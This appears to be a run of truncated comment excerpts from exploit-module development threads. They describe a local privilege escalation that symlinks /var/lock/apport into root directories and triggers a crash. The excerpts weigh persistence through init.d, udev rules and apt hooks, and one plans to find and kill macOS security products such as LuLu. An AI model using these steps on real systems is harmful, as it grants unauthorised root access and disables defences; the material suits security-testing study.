gardnerapp
gardnerapp
Could we create a `~/.ssh/lock` SSH private key and escalate w SSH? I've toyed around with `/etc/rc.d` and couldn't get anything to execute. Basically what I think we're looking for...
The exploit creates a file owned by root:root with the name of lock and 777 permissions. In order to avoid having to re-write the exploit for every single persistence directory...
### /etc/init.d ``` ~$ ls -la /etc/init.d/lock -rwxrwxrwx 1 root root 33 Aug 23 15:11 /etc/init.d/lock $ cat /etc/init.d/lock #! /bin/sh touch /root/it_worked # rebooted system, let init scripts run...
I've create a udev rule by using the exploit: ``` ln -s /etc/udev/rules.d/ /var/lock/apport/ # trigger crash sleep 10s & kill -11 $! ls -la /erc/udev/rules.d/lock -rwxrwxrwx 1 root root...
OK this is all set to go I opted to use apt hooks for the privilege escalation. Thank you to everyone for the contributes and suggestions to this module. Here...
> @gardnerapp sweet! Is this ready to move out of draft? yes
> @gardnerapp any update on this? I've been on vacation, I'll take a look tomorrow and make some changes. My apoloigies
I accidentally committed a file for another exploit please ignore.
I've already gotten a decent bit of the module down just for enumerating. Taking it one product at a time, focusing on LuLu first. I'll link what I've got Friday...
We could find the PID associated w each product and send it a KILL. However some will respawn at launch as they run as agents/daemons. I want to be able...